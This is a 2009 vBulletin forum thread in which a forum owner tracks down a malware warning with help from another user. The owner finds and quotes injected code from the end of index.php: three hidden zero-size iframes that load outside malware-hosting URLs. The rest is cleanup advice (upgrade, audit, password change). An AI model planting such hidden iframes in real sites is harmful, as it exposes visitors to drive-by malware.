Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #1  
Old 08-23-2009, 03:17 PM
rockinaway rockinaway is offline
 
Join Date: Jun 2005
Posts: 211
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Malware ... but where?!.. AHHHH!

I think the title shows all. My forum, http://www.adminfuel.com, gives the error that some sort of malware is present. However, I cannot find anything to do with this. Are there certain areas I should check?

Thanks
Reply With Quote
  #2  
Old 08-23-2009, 03:21 PM
toonysnn toonysnn is offline
 
Join Date: Sep 2006
Location: Texas
Posts: 511
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Let me install my AV and i'll tell you. Lol
Reply With Quote
  #3  
Old 08-23-2009, 03:23 PM
rockinaway rockinaway is offline
 
Join Date: Jun 2005
Posts: 211
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Haha.. thanks
Reply With Quote
  #4  
Old 08-23-2009, 03:34 PM
toonysnn toonysnn is offline
 
Join Date: Sep 2006
Location: Texas
Posts: 511
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

No problem, but one thing I'd suggest, check your index.php and global.php files. If there's something there at the top besides /*=========*\||vbstuff||etc.. then delete it.
Reply With Quote
  #5  
Old 08-23-2009, 03:42 PM
rockinaway rockinaway is offline
 
Join Date: Jun 2005
Posts: 211
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Thanks, I had a look, and there was nothing there BUT I had a look at the end of the index.php file and I found an iframe after the PHP tag closes:

<iframe src="http://google-stat.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/arwe/?736361acd09ca9717c9462514beb5205" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

I have removed this, that the right thing?
Reply With Quote
  #6  
Old 08-23-2009, 03:44 PM
toonysnn toonysnn is offline
 
Join Date: Sep 2006
Location: Texas
Posts: 511
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

That wouldn't do anything anyways. print_output() on that last eval() code disables any further code to be printed.

First of all, I'd suggest you upgrade to at least 3.8.3.

I do not see any suspicious code besides that one in the source, but in Firefox, your style is broken due to the "Reported Attack Site" window. I had to switch to IE8 for viewing your site.
Even in IE8, it doesn't show up. I also used w3 validator.
Reply With Quote
  #7  
Old 08-23-2009, 03:57 PM
rockinaway rockinaway is offline
 
Join Date: Jun 2005
Posts: 211
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Been on holiday so couldn't update. Doing now, bit annoying with the error, but I am submitting to Google to recheck.
Reply With Quote
  #8  
Old 08-23-2009, 03:59 PM
toonysnn toonysnn is offline
 
Join Date: Sep 2006
Location: Texas
Posts: 511
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

rockinaway, at this point I'd have to suggest this:

For security reasons, I'd contact your hosting provider. (Which, according to Google, is Dreamhost?) You should contact them and request that they do a security audit on the server you're located on.

You should change your passwords to something more secure. (eg: cv%3m2Fwe!@#.RE - but note that you'll need to remember the password [clearly, lol])

You should run the vBulletin "Suspect File Versions" script via the administrator control panel.
To do this, go to:
Admin CP > Maintenance > Diagnostics > Suspect File Version

Once that has been completed, if you could screenshot the page (or in firefox, use Screengrab and save/upload the entire frame) I'd try and tell you what to look for.
Reply With Quote
  #9  
Old 08-23-2009, 04:01 PM
rockinaway rockinaway is offline
 
Join Date: Jun 2005
Posts: 211
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I am on 3.8.1 now, if I want to update to the latest 3.8.4, which security patch would I download? I can't figure it out, haha... forgotten everything.

Before, I noticed a strange address appear when page loads, but now I don't see that. I wiill still contact my hosting provider.
Reply With Quote
  #10  
Old 08-23-2009, 04:04 PM
toonysnn toonysnn is offline
 
Join Date: Sep 2006
Location: Texas
Posts: 511
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Just download vBulletin as if you were downloading a new install. vBulletin Members Area - across from the same license for the board you're attempting to upgrade is a "Download vBulletin" and "Download ImpEx" link. The vB one is the one you want to click

Even so, contacting your host and making sure there were no exploited services, up-to-date software, etc is all running fine, then it could be determined to a XSS flaw of some sort, or php script that is on the server.
Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 11:36 PM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.05660 seconds
  • Memory Usage 2,254KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (10)post_thanks_box
  • (10)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (10)post_thanks_postbit_info
  • (10)postbit
  • (10)postbit_onlinestatus
  • (10)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete